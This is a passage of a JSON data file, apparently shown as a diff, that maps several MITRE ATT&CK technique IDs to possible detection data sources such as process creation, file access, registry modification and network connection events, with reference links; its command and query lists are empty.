PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1052.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" 
+ ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive creation", + "description": "A drive was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "drive" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + 
"external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1569", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs 
that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + 
"definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1568.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
